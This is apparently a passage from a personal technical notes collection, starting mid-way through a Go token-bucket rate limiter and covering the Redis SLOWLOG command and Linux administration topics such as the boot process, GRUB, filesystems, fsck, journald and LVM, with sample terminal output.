	elapsed := now.Sub(tb.lastRefill)
	tokensToAdd := int(elapsed / tb.tokenRate)
	if tokensToAdd > 0 {
		tb.tokens = min(tb.capacity, tb.tokens+tokensToAdd)
		tb.lastRefill = now
	}
}

// Consume consumes a token from the bucket if available
func (tb *TokenBucket) Consume() bool {
	tb.mu.Lock()
	defer tb.mu.Unlock()

	tb.refill()
	if tb.tokens > 0 {
		tb.tokens--
		return true
	}
	return false
}

func min(a, b int) int {
	if a < b {
		return a
	}
	return b
}

func main() {
	tb := NewTokenBucket(10, time.Second)  // Capacity of 10 tokens, and refills 1 token every second

	// Simulating rapid requests
	for i := 0; i < 15; i++ {
		if tb.Consume() {
			fmt.Println("Request", i, "allowed")
		} else {
			fmt.Println("Request", i, "denied")
		}
		time.Sleep(500 * time.Millisecond)
	}
}

Redis

Directory Map

redis

redis_architecture

Slowlog

https://redis.io/commands/slowlog-get/

… The SLOWLOG GET command returns entries from the slow log in chronological order

The Redis Slow Log is a system to log queries that exceeded a specified execution time. The execution time does not include I/O operations like talking with the client, sending the reply and so forth, but just the time needed to actually execute the command (this is the only stage of command execution where the thread is blocked and can not serve other requests in the meantime).

A new entry is added to the slow log whenever a command exceeds the execution time threshold defined by the slowlog-log-slower-than configuration directive. The maximum number of entries in the slow log is governed by the slowlog-max-len configuration directive.

By default the command returns latest ten entries in the log. The optional count argument limits the number of returned entries, so the command returns at most up to count entries, the special number -1 means return all entries.

Each entry from the slow log is comprised of the following six values:

  1. A unique progressive identifier for every slow log entry.
  2. The unix timestamp at which the logged command was processed.
  3. The amount of time needed for its execution, in microseconds.
  4. The array composing the arguments of the command.
  5. Client IP address and port.
  6. Client name if set via the CLIENT SETNAME command.

The entry’s unique ID can be used in order to avoid processing slow log entries multiple times (for instance you may have a script sending you an email alert for every new slow log entry). The ID is never reset in the course of the Redis server execution, only a server restart will reset it.

SLOWLOG GET [count]

Systems

Notes on Linux systems administration, kernel internals, and system-level concepts.

Core Topics

System Fundamentals

System Services and Configuration

Development and Tools

System Internals

Observability and Troubleshooting

Subdirectories

Bash

Shell scripting and bash-specific notes

Commands

Detailed documentation for specific Linux commands

Greybeard Qualification

Advanced Linux system administration topics

Linux Kernel Boot Process

High Level Process:

  1. The machine’s BIOS or EUFI loads and runs a boot loader
  2. The boot loader finds the kernel image on disk, loads it into memory, and starts it.
  3. The kernel takes over and initializes the devices and drivers for each. This happens in the following order:
    1. CPU inspection
    2. memory inspection
    3. device bus discovery
    4. device discovery
    5. Auxiliary kernel subsystem setup (networking, etc.)
  4. The kernel mounts the root filesystem
  5. The kernel starts a program called init (systemd) with a PID of 1. This point is the user-space startup.
  6. init sets the rest of the system processes in motion
  7. At some point, init starts a process allowing you to login, usually at the end or near the end of the boot sequence.

The best way to view the boot process diagnostic logs is with journalctl. You can use journalctl -k to view messages from the current boot. You can use the -b option to view messages from previous boots. You can also check for a log file such as /var/log/kern.log or run the dmesg command to view the messages in the kernel ring buffer.

Kernel parameters

When the linux kernel starts, it receives a list of text parameters containg a few additional system details. The parameters specify many different types of behavior, such as the amount of diagnostic output the kernel should produce and device driver-specific options.

  • You can view the parameters passed to the kernel by looking at the /proc/cmdline file:
    root@nginx-vm-00:~# cat /proc/cmdline
    BOOT_IMAGE=/boot/vmlinuz-5.15.0-1029-azure root=PARTUUID=c51187ab-04cc-499f-8947-0211dc8d74e7 ro console=tty1 console=ttyS0 earlyprintk=ttyS0 panic=-1
    
    Upon encountering a parameter that the kernel does not understand, the kernel passes that parameter to the init system. For example, if you were to pass the -s parameter to the kernel, the kernel would pass that parameter to systemd to boot the system into single-user mode. Read the bootparam(7) man page for more info on kernel boot parameters.

Boot Loaders

  • At the start of the boot process, a boot loader starts the kernel. It loads the kernel into memory from somewhere on disk, and then starts the kernel with a set of kernel parameters as described above. This process sounds simple, right? Well, it gets a bit more complicated. Some questions need to be answered: “where is the kernel?” and “what boot parameters do we use?”. It seems like these answers should be easy to find. But remember, the kernel is not yet running, and it’s the kernel’s job to traverse a file system to locate files. We have a ‘chicken and egg’ problem.
  • A boot loader does need a driver to access a disk. On PCs, the boot loader uses the BIOS of UEFI to access disks. Disk hardware typically includes firmware that allows the BIOS or UEFI to acecss attached storage hardware via Logical Block Addressing (LBA). LBA is a universal, simple way to access data from any disk.
  • To determine if your system uses BIOS or UEFI, you can run efibootmgr. If you get a list of boot devices, your system is using UEFI. If you get an error stating UEFI parameters are not supported, your system is using BIOS. Alternatively, if /sys/firmware/efi exists, your system is using UEFI.
  • Boot loaders typically allow users to switch between different kernels and operating systems.
  • Common Boot Loaders
    • GRUB = Used on most linux systems. Supports BIOS and UEFI
    • LILO = One of the first boot loaders available for linux.
    • SYSLINUX
    • systemd-boot
    • coreboot
  • Accessing the boot loader may be different on each system. Linux distrobutions tend to heavily modify the boot loader, causing some confusion. On a PC, you can typically hold down shift or esc to access the boot loader shortly after powering on the system.
  • To generate a grub configuration file:
    • grub2-mkconfig -o /boot/grub2/grub.cfg for BIOS systems
    • grub2-mkconfig -o /boot/efi/EFI/grub.cfg for EFI systems
    • grub2-install can be used to install grub on a disk
    • The boot loader is typically stored on the first few sectors of a disk
    • The grub2.cfg file is typically stored at /boot/grub2/grub.cfg for BIOS systems
  • /etc/default/grub is used by the grub2-mkconfig utility to determine what settings to use when it generates the grub2.cfg file. After you modify this file, you need to run grub2-mkconfig to actually regenerate the grub2 config
    GRUB_TIMEOUT=1
    GRUB_TIMEOUT_STYLE=countdown
    GRUB_DISTRIBUTOR="$(sed 's, release .*$,,g' /etc/system-release)"
    GRUB_DEFAULT=saved
    GRUB_DISABLE_SUBMENU=true
    GRUB_TERMINAL="serial console"
    GRUB_CMDLINE_LINUX="console=tty1 console=ttyS0,115200n8 earlyprintk=ttyS0,115200 rootdelay=300 scsi_mod.use_blk_mq=y crashkernel=auto"
    GRUB_DISABLE_RECOVERY="true"
    GRUB_ENABLE_BLSCFG=true
    GRUB_SERIAL_COMMAND="serial --speed=115200 --unit=0 --word=8 --parity=no --stop=1"
    
  • Install, Configure, and Troubleshoot BootLoaders
    • To regenerate grub2 config:
      • Boot into recovery media, then:
        • chroot /mnt/sysroot
        • To regenerate grub config for BIOS system
          • grub2-mkconfig -o /boot/grub2/grub.cfg
        • To regenerate grub config for EFI system:
          • grub2-mkconfig -o /boot/efi/EFI/centos/grub.cfg
    • To reinstall the boot loader:
      • BIOS systems:
        • Use lsblk to look at block devices. Try to identify the boot device
        • Use grub2-install /dev/sda to install grub to the boot device
      • EFI Systems:
      • Use dnf reinstall grub2-efi grub2-efi-modules shim to reinstall grub to the boot device

Grub

  • The grub configuration directory is usually /boot/grub or /boot/grub2 (grub2 on redhat distros)
  • The main configuration file for grub is grub.cfg. Do not modify this file directly, instead use grub-mkconfig. The files in /etc/grub.d are shell scripts that make up the grub.cfg. When you call grub-mkconfig, it references these scripts in /etc/grub.d to create the grub.cfg. To modify the grub configuration, simply add another script to this directory. Then call grub-mkconfig, overwriting the /boot/grub/grub.cfg file: grub-mkconfig -o /boot/grub/grub.cfg
  • To (re)install grub, you can use grub-install
    • Example for installing grub on a mounted storage device: grub-install --boot-directory=/mnt/boot /dev/sdc

User space init

Process overview:

  1. init system starts (typically systemd)
  2. Essential low-level services start (think udevd and syslogd)
  3. Network services start
  4. Mid and high-level services start (cron, printing, etc.)
  5. Login prompts, GUIs, and high-level apps, such as web servers start

Shutting down the system

  • You can use sudo systemctl reboot --force to force a system to reboot
  • only the superuser can reboot
  • shutdown takes a time parameter for scheduling a shutdown.
    • ex: shutdown 03:00 = shutdown at 3AM
    • shutdown +15 shutdown in 15 minutes
    • If you specify a time in the future, the shutdown command creates a file called /etc/nologin and no one but the superuser is able to login to the system.
    • When the shutdown time arrives, shutdown tells the init system to begin the shutdown process. On a system using systemd, this means activating the shutdown units.
  • If you halt the system, it shuts the machine down immediately. To do this, run: shutdown -h now or halt
    • On most versions of Linux, a halt cuts power to the system. This can be unforgiving, as it does not give disk buffers time to sync (potentially causing corrupt data).
  • The shutdown process:
    1. init asks every process to shut down cleanly
    2. If a process doesn’t respond after a while, init kills it, first trying a TERM signal
    3. If the TERM signal doesn’t work, init uses the KILL signal
    4. The system locks system files to prevent modification
    5. The system unmounts all filesystems other than root
    6. The system remounts root as read-only
    7. The final step is to call the kernel to reboot or stop with the reboot(2) system call

InitRam FS

  • We need the initramfs because the kernel does not talk directly to the PC BIOS or EFI to get data from disks. So in order to mount its root filesystem, it needs driver support for the underlying storage. There are so many storage controllers that having a driver for each one in the kernel is not feasible. Therefore, these drivers are shipped as loadable modules. These modules exist on disk, so we have a chicken and egg scenario. How can the kernel load these drivers from disk if it cannot read the disk because it doesn’t currently have these drivers loaded?
  • The workaround is to gather these drives along with a few other utilities into a cpio archive. The boot loader loads this archive into memory before running the kernel. Upon start, the kernel reads the contents of the archive into a temp file system in RAM known as the initramfs, mounts it at /, and performs the user-mode handoff to the init on the initramfs. Then, the utilities included in the initramfs allow the kernel to load the necessary driver modules for the real root filesystem. Finally, the utilities mount the real root filesystem and start the init system.

Common Files and Directories

Most system configuration files on a Linux system are found in /etc

Dev Tools

GCC (c compiler)

The c compiler on most Unix systems is the GNU C Compiler (gcc).

Here is a classic program written in c:

#include <stdio.h>

int main(){
  printf("Hello, World!\n");
}

You can compile it by saving it in a file ending with a .c extension, and then running:

cc -o hello hello.c

Shared Libraries

Shared libraries have a .so extension (shared object)

You can see what shared libraries a program uses by running ldd:

ryan:notes/  |main ?:1 ✗|$ ldd /bin/bash
        linux-vdso.so.1 (0x00007fff758ab000)
        libtinfo.so.6 => /lib/x86_64-linux-gnu/libtinfo.so.6 (0x00007fae9d281000)
        libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007fae9d059000)
        /lib64/ld-linux-x86-64.so.2 (0x00007fae9d429000)

devices

  • The udev service enables user space programs to automatically configure and use new devices.
  • The kernel presents many IO interfaces for devices as files to user space processes
  • device files are in the /dev directory
  • to identify a device and view it’s properties, use ls -l. Note the first character of each line in the output below. If you see b (block), c (character), p (pipe), or s (socket), the file is a device.
    • ryan:notes/  |main ✓|$ ls -l /dev | head
      total 0
      crw-------   1 root root       10,   107 Jan  6 15:14 acpi_thermal_rel
      crw-r--r--   1 root root       10,   235 Jan  6 15:14 autofs
      drwxr-xr-x   2 root root             260 Jan  6 15:14 block/
      crw-rw----   1 root disk       10,   234 Jan  6 15:14 btrfs-control
      drwxr-xr-x   3 root root              60 Jan  6 15:14 bus/
      drwxr-xr-x   2 root root            5960 Jan  7 08:29 char/
      crw--w----   1 root tty         5,     1 Jan  6 15:14 console
      lrwxrwxrwx   1 root root              11 Jan  6 15:14 core -> /proc/kcore
      drwxr-xr-x  10 root root             220 Jan  6 15:14 cpu/
      

device types

  • block device = hard disks. Data is read in chunks
  • character device = data is read in streams (monitors, printers, etc.)
  • pipes = like character devices, except another process is at the end of the IO stream
  • socket = special purpose interfaces that are typically used for inter-process communications

sysfs

  • The sysfs filesystem is a pseudo-filesystem which provides an interface to kernel data structures.
  • The sysfs filesystem is commonly mounted at /sys.
  • Many of the files in the sysfs filesystem are read-only, but some files are writable, allowing kernel variables to be changed. To avoid redundancy, symbolic links are heavily used to connect entries across the filesystem tree.
ryan:~/ $ ll /sys/
total 4
   1 0 dr-xr-xr-x  13 root root    0 Jan  6 15:14 ./
   2 4 drwxr-xr-x  20 root root 4096 Dec 27 19:39 ../
8359 0 drwxr-xr-x   2 root root    0 Jan  6 15:14 block/
   8 0 drwxr-xr-x  54 root root    0 Jan  6 15:14 bus/
  10 0 drwxr-xr-x  87 root root    0 Jan  6 15:14 class/
   5 0 drwxr-xr-x   4 root root    0 Jan  6 15:14 dev/
   4 0 drwxr-xr-x  29 root root    0 Jan  6 15:14 devices/
  11 0 drwxr-xr-x   6 root root    0 Jan  6 15:14 firmware/
   2 0 drwxr-xr-x  10 root root    0 Jan  6 15:14 fs/
  12 0 drwxr-xr-x   2 root root    0 Jan  6 15:14 hypervisor/
5235 0 drwxr-xr-x  17 root root    0 Jan  6 15:14 kernel/
6394 0 drwxr-xr-x 349 root root    0 Jan  6 15:14 module/
5247 0 drwxr-xr-x   3 root root    0 Jan  6 15:14 power/

  • The most important directories within /sys are:
    • block = contains info for every block device attached to the system
    • bus = contains a directory for every bus type in the kernel
    • hypervisor =
    • class
    • devices
    • kernel
    • firmware
    • module
    • power

https://docs.kernel.org/filesystems/sysfs.html https://www.kernel.org/doc/Documentation/filesystems/sysfs.txt

Hard Disks

  • Most block devices attached to a Linux system will have a device name with a prefix of /dev/sd*

    • Example: /dev/sda
    • The ‘sd’ portion stands for SCSI Disk
  • To list the SCSI devices on your system, use a tool that walks the SCSI device paths, such as lsscsi

    • lsscsi is not commonly installed by default

udevd

  • udevd is responsible for creating device files for attached devices
  • The process is commonly systemd-udevd
  • The kernel will send a notification to this process upon detecting a new device attached to the system. Udevd will then create a file in user-land for the device.
    • This caused problems because some devices need to be available very early in the boot process, so devtmpfs was created
    • devtmpfs filesytem is used by the kernel to create device files as necessary, but it also notifies udevd that a new device is available. Upon receiving this signal, udevd does not create a new device file, but it does perform device initialization along with setting permissions and notifying other processes that new devices are available.

Disks

  • Modern disks include an on-disk queue for I/O requests. I/O accepted by the disk may either be waiting on the queue or served. While this may imply a first-come, first-served queue, the on-disk controller can apply other algorithms to optimize performance. These algorithms include elevator seeking for rotational disks or separate queues for read and write I/O (especially for flash disks).

Caching

The on-disk cache may also be used to increase write performance, by using it as a write-back cache. This signals writes as having completed after the data transfer to cache and before the slower transfer to persistent storage. The counter-term is the write-through cache, which completes writes only after the full transfer to the next level. Storage write-back caches are often coupled with batteries, in case of power failure.

The best caching is no caching at all.

At the disk device driver level and below, caches may include the following:

  • Device Cache
  • Block Cache
  • Disk Controller Cache
  • Storage Array Cache
  • On-disk Cache

Measuring Time

Storage time can be measured as:

  • I/O request time: the entire time from issuing I/O to it’s completion
  • I/O Wait time: The time spent waiting in a queue
  • I/O service time: The time during which the I/O was processing

file systems

  • A file system is like a database. It defines the structure to transform a simple block device into a sophisticated heirarchy of files and directories that users can understand.
  • File Systems are typically implemented in the Kernel. However, 9P from Plan 9 has inspired the development of user-space file systems. The FUSE (File System in User Space) feature allows file systems to be created in user-space.
  • The following list shows the most common file systems in use today:
    • ext4 (extended file system, v4)
      • Supports journaling (a small cache outside of the file system) to provide data integrity and hasten booting (introduced with ext3)
      • The ext4 file system is an incremental improvement over ext2/3 and provides support for larger files and a greater number of directories.
    • btrfs (b-tree filesystem)
      • a newer file system native to linux, designed to scale beyond the limitations of ext4
    • FAT (file allocation table)
      • 3 types: msdos, vfat, exfat
      • Used by most removable flash media
      • Supported by Windows, Darwin, and Linux
    • XFS
      • A high performance filesystem used by default on some Linux distros, such as RHEL
    • HFS+
      • An Apple standard filesystem used on Mac systems
    • ISO 9660
      • Used on CD-ROM discs

Directories

  • Directories in Linux (ext file systems) are just a file with a table. The table has 2 columns. The two columns contain the name and the inode of the files within the directory.

inodes

  • A traditional *nix file system has two primary components: a pool of data blocks where you can store data and a database system that manages that data pool. The database system is centered around the inode data structure. An inode is metadata about a file. Inodes are identified by numbers in an inode table. File names and directories are implemented as inodes.
  • A directory inode contains a list of filenames and links correspending to other inodes.
  • To view the inode numbers for any directory, use ls -i or stat <filename>
  • 3 time stamps:
    • atime: last time the file was open()
    • mtime: last time the file was modified
    • ctime: ctime IS NOT creation time. It is the last time the inode was changed. For example, using chown or chmod will change the ctime.

Format a partition with a file system

  • When preparing new storage devices, after partitioning the device, you are ready to create a file system
    • You can use mkfs to create partitions. mkfs has several aliases for each partition type. Example: mkfs.ext4, mkfs.xfs, etc.
    • mkfs will automatically detect blocks on a device and set some reasonable defaults based on this. Unless you really understand what you are doing, do not change these defaults.

Mounting a file system

  • After creating a file system on a partition, you can mount it using the mount command
    • Usage: mount -t *type* *device* *mountpoint*
    • Example: mount -t ext4 /dev/sda2 /mnt/mydisk
    • To unmount a file system, use unmount
      • Example: unmount /mnt/mydisk
    • It is recommended to mount a file system with it’s UUID, rather than it’s name. Device names are determined by the order in which the kernel finds the device and can change over time.
      • You can use blkid or lsblk -f to identify the UUID of a partition
      • You can then mount using the UUID by:
        • mount UUID=<insert UUID here> /mnt/mydisk

The number of options available for the mount command is staggering. You should review the man page for more info

Buffering/Cache/Caching

  • Linux, like other Unix variants, buffer writes to the disk. This means that the kernel doesn’t immediately write changes to the disk. But will instead write the changes to a buffer in RAM and then later write them to the disk when it deems appropriate.
  • When you unmount a file system with unmount, it’s changes are automatically written to the disk from the buffer (why is why you should always unmount partitions before removing them from the system, i.e. USB drives). However, you can also force this to happen using the sync command.
  • The kernel also uses a cache to store reads from the disk. This way, if a process continually reads the same data from the disk, it doesn’t have to go to the disk every time to fetch the data, rather using the cache to read the data from.

Automatically mounting filesystems at boot time

  • The /etc/fstab file is used to automatically mount filesystems at boot time
  • There are two alternatives to /etc/fstab
    • /etc/fstab.d/ directory. This directory can contain individual filesystem configuration files (one for each filesystem).
    • Systemd unit files.

Filesystem Utilization

  • To view the utilization of your currently mounted filesytem, you can use the df command.
    • Pass the -h flag to view free space in a human readable form
      • Example: df -h

Checking and Repairing Filesystems

  • Filesystem errors are usually due to a user shutting down a system in a wrong way (like pulling the power cable). Such situations could leave the filesystem cache in memory not matching the data on the disk. This is especially bad if the system is in the process of modifying the filesystem when you give it a kick. Many filesystems support journaling (ext3+ filesystems for example), but you should always shut down a system properly.
  • The tool to check a filesystem for errors is fsck. There is a different version of fsck for each filesystem that linux supports. For example, the ext filesystems will use e2fsck to check the filesystem for errors. However, you don’t need to run e2fsck directly. You can just run fsck and it will usually detect the filesystems and run the appropriate repair tool.
  • You should never run fsck on a mounted filesystem. The kernel may alter data in the filesystem as you run the check, causing runtime mismatches that can crash the system and corrupt files. There is one exception to this rule. If you mount the root partition in read-only, single-user mode, you can run fsck on it.
  • When fsck asks you about reconnecting an inode, it has found a file that doesn’t appear to have a name. When reconnecting an inode, fsck will place the file in the lost+found directory with a number as the name. fsck does this by walking through the inode table and directory structure to generate new link counts and a new block allocation map (such as the block bitmap), and then it compares this newly generated data with the filesystem on the disk. If there are mismatches, fsck must fix the link counts and determine what to do with any inodes and/or data that didn’t come up when it traversed the directory structure.
  • On a system that has many problems, fsck can make things worse. One way to tell if you should cancel the fsck utility is if it asks a lot of questions while running the repair process. This is usually indicative of a bigger problem. If you think this is the case, you can run fsck -n to run fsck in dry mode (no changes will be made to the partition).
  • If you suspect that a superblock is corrupt, perhaps because someone overwrote the beginning of the disk, you might be able to recover the filesystem with one of the superblock backups that mkfs creates. Use fsck -b <num> to replace the corrupted superblock with an alternate at num and hope for the best. If you don’t know where to find a backup for the superblock, you can run mkfs -n on the device to view a list of superblock backup numbers without destroying your data.
  • You normally do not need to check ext3/4 filesystems manually because the journal ensures data integrity.
  • The kernel will not mount an ext3/4 filesystems with a non-empty journal. You can flush the journal using e2fsck -fy /dev/<device>

Special purpose filesystems

  • proc - mounted on /proc. Each numbered directory inside /proc refers to the PID of a running process on the system. The directory /proc/self represents the current process.
  • sysfs - mounted on /sys. See ./devices.md for more info.
  • tmpfs - mounted on /run and other locations. Allows you to use physical memory and swap space as temporary storage.
  • squashfs - a type of read-only filesystem where content is stored in a compressed format and extracted on-demand through a loopback device.
  • overlay - a filesystem that merges directories in a composite directory. Often used by containers.

Swap space

  • Swap space is used to augment the RAM on a machine with disk space
  • If you run out of physical memory, the Linux virtual memory system can move pages of memory to and from disk storage (swap space). This is referred to as paging.
  • You can use mkswap to create swap space on a partition. Then use swapon to enable it. You can also use swapoff to disable swap space.
  • In addition to using disk space for swap, you can also use a file. You can first create the file with dd. Example: dd if=/dev/zero of=/swapfile bs=1024k count=<size in megabytes>
  • High performance servers should not have swap space and should avoid disk access if at all possible.

Prefetch

A common file system workload involves reading a large amount of file data sequentially, for example, for a file system backup. This data may be too large to fit in the cache, or it may be read only once, and is therefore unlikely to remain in the cache. Such a workload would perform relatively poorly, as it would have a low cache-hit ratio.

Prefetch is a common file system feature for solving this problem. It can detect a sequential read workload based on the current and previous file I/O offsets, and then predict and issue disk reads before the application has requested them. This populates the file system cache, so that if the application does perform the expected read, it results in a cache-hit, rather than reading from much slower disk.

Prefetch can typically be tuned in most systems.

Write-back Caching

Write-back caching is commonly used by file systems to improve write performance. It works by treating writes as completed after the transfer to main memory, and writing them to disk sometime later, asynchronously. The file system process for writing this ‘dirty’ data to disk is called ‘flushing’. The trade-off of write-back cache is reliability. DRAM-based main memory is volatile, and dirty data can be lost in the event of a power failure. Data could also be written to disk incompletely, leaving the disk in a corrupt state. If file-system metadata becomes corrupted, the file system may no longer load.

Synchronous writes

Synchronous writes are used by some applications such as database log writers, where the risk of data corruption for asynchronous writes is unacceptable.

VFS (Virtual File System)

VFS provides a common interface for different file system types. Prior to VFS, different file systems required different system calls for interacting with each. The calls for interacting with a FAT file system were different than those for a EXT file system.

File System Caches

Unix originally only had the buffer cache to improve performance of block device access. Nowadays, Linux has multiple different cache types.

  • Page Cache
  • Buffer cache
  • Directory Cache
  • inode cache

Copy on write

A Copy on write (COW) file system does not overwrite existing blocks but instead follows these steps:

  1. Write blocks to a new location (a new copy)
  2. Update references to new blocks
  3. Add old blocks to the free list

This helps maintain file system integrity in the event of a system failure, and also helps improve performance by turning random writes into sequential ones

Troubleshooting File Systems

Key metrics for file systems include:

  • Operation Rate
  • Operation latency

In Linux, there are typically no readily available metrics for file system operations (the exception being NFS, via nfsstat).

Tools:

  • mount
  • free
  • top
  • vmstat
  • sar
  • slabtop
  • filetop
  • cachestat
  • fsck
  • ext4slower
  • e2fsck

Groups

Groups offer a way to share files and directories among users.

  • The /etc/group file defines the group IDs. Each line in this file represents a group, with fields separated by colons. There are 4 fields:

    1. The group name
    2. The group password (this can be ignored)
    3. The group Id
    4. An optional list of users that belong to the group
  • To see the groups you belong to, run groups

Hashing

Interrupts and Traps

  • Most operating systems are implemented as interrupt-driven systems. Meaning the OS doesn’t run until some entity needs it to do something, the OS is woken up to handle a request.
  • System calls are implemented as special trap instructions that are defined as part of the CPU’s ISA.
  • Each system call is associated with a number. When an application wants to invoke a system call, it places the desired call’s number in a known location and issues a trap instruction to interrupt the OS. The trap triggers the CPU to stop executing its current instruction, and proceed execution the requesting application’s instruction.
  • Interrupts that come from the hardware layer, such as when a NIC receives data from the network, are typically referred to as hardware interrupts, or just interrupts. Interrupts that come from the software layer as the result of instruction execution, are known as traps.
  • Unlike system calls, hardware interrupts are delivered via the CPU’s interrupt bus. A device place’s a signal on the interrupt bus when it needs the CPU’s attention.
  • When the CPU is done handling an interrupt, it resumes processing it’s state before the interrupt occurred.

kernel subsystems

Linux kernel has 5 subsystems:

  1. The Process Scheduler (SCHED)
  2. The Memory Manager (MM)
  3. The Virtual File System (VFS)
  4. The Networking Interface (NET)
  5. The Inter-process Communication (IPC)

Kernel structure and subsystem dependencies

Key Value Store

Hard and Soft Links

Use ln to manage soft and hard links

Inodes

  • An inode is a reference to a file on the disk
  • The stat command can be used to view inodes
  • When there are 0 links to an inode, the data itself is erased from the disk
  • Hard links point to the same inode
  • You can only hardlink to files, not directories
  • You cannot hardlink to files on a mount, only files on the same filesystem
  • Soft links create a shortcut directly to the file, rather than a link to the inode
  • readlink can be used to view the file behind a softlink
  • broken soft links are highlighted in red in the output of ls -l

commands

Logging

Journald

Most programs write their log output to the syslog service. The syslogd daemon performs this service on traditional systems by listening for these messages and sending them to the appropriate channel (file, database, email, etc.) when received. On modern systems, journald typically does this work. journalctl can be used to work with journald.

You can determine if your system is using journald by typing journalctl in a shell. If the system is using journald, you will see a paged output. Unless you have a system that is using a traditional syslog daemon such as syslogd or rsyslogd, you will use the journal. To get the full output from journalctl, you need to run the command as root or as a user of the adm or systemd-journal groups.

  • Some examples of using journalctl:

    • To search for logs from a process using the PID: journalctl _PID=555 (where 555 is the PID)
    • To search for messages from the past 4 hours: journalctl -S -4h
    • To filter by unit: journalctl -u sshd.service
    • To search by a given field: journalctl -F _SYSTEMD_UNIT
    • If you do not know what fields are available, use: journalctl -N
    • To view the logs from this boot: journalctl -b
    • To view the logs from the previous boot: journalctl -b -1
    • To list all boots by ID: journalctl --list-boots
    • To view Kernel messages: journalctl -k
    • To filter by severity level: journalctl -p 3 (where 3 is the severity level. Values range from 0 (most important) to 7 (least important))
  • Journal maintenance

    • the journal files stored in /var/log/journal do not need to be rotated. journald handles the maintenance of these files.

Syslogd

Syslogd first appeared with the sendmail email server back in the 1980’s. Developers of other services readily adopted it, and RFC3164 was ratified to define it. The syslog mechanism is simple. It listens on a Unix domain socket, /dev/log. Though, it can also listen on a network socket, enabling any device on the network to send logs to it. This makes rsyslogd act as a log server.

  • Facility, severity, and priority
    • Syslog sends messages of various types from different services to different destinations. Becuase of this, it needs a way to classify each message.
    • The facility is a general category of service, used to identify the service that sent the message. The available facilities in the syslog protocol are hardwired and there is no way to add your own. However, you can use a general local0 through local7 value.
    • The severity is the urgency of the log messages. This can be a value from 0 (most urgent) to 7 (least urgent)
        1. emerg
        1. alert
        1. crit
        1. err
        1. warn
        1. notice
        1. info
        1. debug
    • The facility and the severity together make up the priority, packaged as a single value in the syslog protocol. You can read more about this in RFC 5424

Logfile Rotation

When you are using a syslog daemon, log messages get put into files somewhere on the system. These files need to be rotated on a schedule to prevent the files from consuming too much storage space. logrotate performs this task.

  • How logrotate works:
    1. Remove the oldest file, auth.log.3
    2. Renames auth.log.2 to auth.log.3
    3. Renames auth.log.1 to auth.log.2
    4. Renames auth.log to auth.log.1

lvm (logical volume manager)

  • LVM creates an abstraction layer between physical storage and the file system, allowing the file system to be resized and span across multiple disks

  • Physical volumes are grouped into groups of volumes, called Volume Groups. These Volume Groups are then divided into Logical Volumes

  • LVM Acronyms

    • PV = Physical Volume, real physical storage devices

      • sudo lvmdiskscan can be used to list devices that may be used as physical volumes
        04:52:03 azureadmin@centos01 ~ → sudo lvmdiskscan
        /dev/sda1  [     500.00 MiB]
        /dev/sda2  [      29.02 GiB]
        /dev/sda15 [     495.00 MiB]
        /dev/sdb1  [     <64.00 GiB]
        /dev/sdf   [       5.00 GiB]
        /dev/sdh   [       5.00 GiB]
        /dev/sdi   [       5.00 GiB]
        3 disks
        4 partitions
        0 LVM physical volume whole disks
        0 LVM physical volumes
        
      • 'sudo pvcreate /dev/sdc /dev/sdd /dev/sde can be used to create a new LVM volume from 3 disks
        04:52:06 azureadmin@centos01 ~ → sudo pvcreate /dev/sdf /dev/sdh /dev/sdi
        Physical volume "/dev/sdf" successfully created.
        Physical volume "/dev/sdh" successfully created.
        Physical volume "/dev/sdi" successfully created.
        
      • sudo pvs can be used to list physical volumes used by LVM
        04:52:19 azureadmin@centos01 ~ → sudo pvs
        PV         VG Fmt  Attr PSize PFree
        /dev/sdf      lvm2 ---  5.00g 5.00g
        /dev/sdh      lvm2 ---  5.00g 5.00g
        /dev/sdi      lvm2 ---  5.00g 5.00g
        
    • VG = Volume Group

      • After LVM has physical devices (pvs), you add the pvs to a volume group (vg). This tells LVM how it can use the storage capacity
      • sudo vgcreate my_volume /dev/sdf /dev/sdh will create a new VG with 2 PV
        04:58:13 azureadmin@centos01 ~ → sudo vgcreate my_vol /dev/sdf /dev/sdh
        Volume group "my_vol" successfully created
        
      • Once disks are added to a volume group, they are seen by the system as one contiguous block of storage
      • You can add another disk to the volume group using vgextend
        05:00:06 azureadmin@centos01 ~ → sudo vgextend my_vol /dev/sdi
        Volume group "my_vol" successfully extended
        
      • use sudo vgs to view the status of Volume Groups:
        05:00:14 azureadmin@centos01 ~ → sudo vgs
        VG     #PV #LV #SN Attr   VSize   VFree
        my_vol   3   0   0 wz--n- <14.99g <14.99g
        
      • use sudo vgreduce my_vol /dev/sdi to remove a physical volume from a volume group
        05:00:39 azureadmin@centos01 ~ → sudo vgreduce my_vol /dev/sdi
        Removed "/dev/sdi" from volume group "my_vol"
        
    • LV = Logical Volume

      • A logical volume is similar to a partition
      • sudo lvcreate --size 2G --name partition1 my_vol can be used to create a logical volume of 2 gigabytes
        05:02:22 azureadmin@centos01 ~ → sudo lvcreate --size 2G --name partition1 my_vol
        Logical volume "partition1" created.
        
      • You can view logical volumes using sudo lvs
        05:03:49 azureadmin@centos01 ~ → sudo lvs
        LV         VG     Attr       LSize Pool Origin Data%  Meta%  Move Log Cpy%Sync Convert
        partition1 my_vol -wi-a----- 2.00g
        partition2 my_vol -wi-a----- 6.00g
        
      • to tell a logical volume to use all space on a logical volume, use sudo lvresize
        05:03:50 azureadmin@centos01 ~ → sudo lvresize --extents 100%VG my_vol/partition1
        Reducing 100%VG to remaining free space 3.99 GiB in VG.
        Size of logical volume my_vol/partition1 changed from 2.00 GiB (512 extents) to 3.99 GiB (1022 extents).
        Logical volume my_vol/partition1 successfully resized.
        
      • the path to LVs on the system can be found using lvdisplay
        05:08:32 azureadmin@centos01 ~ → sudo lvdisplay  | grep "LV Path"
        LV Path                /dev/my_vol/partition1
        LV Path                /dev/my_vol/partition2
        
      • You can then add a file system to a LV using common file system management commands
        05:08:41 azureadmin@centos01 ~ → sudo mkfs.xfs /dev/my_vol/partition1
        meta-data=/dev/my_vol/partition1 isize=512    agcount=4, agsize=261632 blks
                =                       sectsz=4096  attr=2, projid32bit=1
                =                       crc=1        finobt=1, sparse=1, rmapbt=0
                =                       reflink=1
        data     =                       bsize=4096   blocks=1046528, imaxpct=25
                =                       sunit=0      swidth=0 blks
        naming   =version 2              bsize=4096   ascii-ci=0, ftype=1
        log      =internal log           bsize=4096   blocks=2560, version=2
                =                       sectsz=4096  sunit=1 blks, lazy-count=1
        realtime =none                   extsz=4096   blocks=0, rtextents=0
        Discarding blocks...Done.
        
      • If the LV contains a file system, you must take extra caution when resizing it. You must pass the --resizefs parameter to lvresize
